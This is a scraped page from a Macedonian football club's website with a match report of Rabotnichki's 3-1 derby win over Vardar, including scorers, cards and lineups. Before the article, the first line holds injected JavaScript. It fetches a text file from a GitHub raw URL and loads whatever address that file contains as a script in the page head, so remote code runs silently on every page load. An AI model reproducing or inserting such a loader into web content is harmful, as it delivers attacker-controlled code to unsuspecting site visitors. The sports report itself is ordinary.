;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Феноменален триумф во дербито против Вардар (3-1)
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Феноменален триумф во дербито против Вардар (3-1)

Работнички оствари голем триумф (3-1) над шампионот Вардар во дерби натпреварот што се одигра денеска на арената „Филип Втори“. Тоа е втора победа во низа за составот на тренерот Горан Станковски, откако во неделата беше совладан и Пелистер.


Работнички сосема заслужено го совлада Вардар на денешниот дуел. Се чини и дека повеќе ја посакуваше победата, а фудбалерите на Станковски „гинеа“ на теренот за секоја топка.

Нашиот тим дојде во водство во 17.минута. Рашо испрати центаршут од десната страна, а Сержо јуниор со волеј – удар го совлада Гачевски. По ова, се закани и Гофри со удар од 16 метри, но топката заврши крај голот на Вардар.

Во 39.минута, Бобан Николов имаше одлична можност за израмнување, но од осум метри шутираше над голот на Божиновски.

На стартот од вториот дел, Сержо јуниор го проигра Остоја Стјепановиќ, тој шутираше од 14 метри, но Гачевски спаси сигурен гол.

Во 70.минута, по стартот на Садики над Демири, судијата Мечкаровски покажа на белата точка, а Дејан Блажевски од пенал го израмни резултатот. Но, само три минути подоцна беше досуден и пенал за Работнички.

Блажевски играше со рака во шеснаесетникот, а Остоја Стјепановиќ повторно донесе предност за нашиот тим.

До крајот, Вардар тргна на се или ништо, шанса имаше Максимов, но се сплетка пред голот на Божиновски, а во 82.минута нововлезениот Миле Тодоров го зададе конечниот удар за Вардар.

Сержо јуниор одлично продре по десната страна, нафрли на петерецот, а Тодоров со глава ја испрати топката во мрежата на Вардар.

РАБОТНИЧКИ – ВАРДАР 3-1 (1-0)

Арена „Филип Втори“ во Скопје. Судија. Димитар Мечкаровски (Скопје). Стрелци: Сержо јуниор 17′, Стјепановиќ 73′ пен., Тодоров 82′ (Работнички), Блажевски 70′ пен. (Вардар). Ж.картони: Митрев, Трајчевски, Садики (Работнички), Хамбарџумјан, Новак, Блажевски, Гачевски (Вардар).

РАБОТНИЧКИ: Божиновски, Рашо, Митрев, Садики, Билали, Стјепановиќ (75′ Тодоров), Дурански, Велинов, Погосјан (39′ Трајчевски), Сержо јуниор (85′ Најдовски), Гофри.

ВАРДАР: Гачевски, Хамбарџумјан, Грнчаров, Новак, Демири, Глигоров (68′ Марковиќ), Николов (46′ Блажевски), Стојчевски, Фелипе, Барсегјан (46′ Итало), Максимов.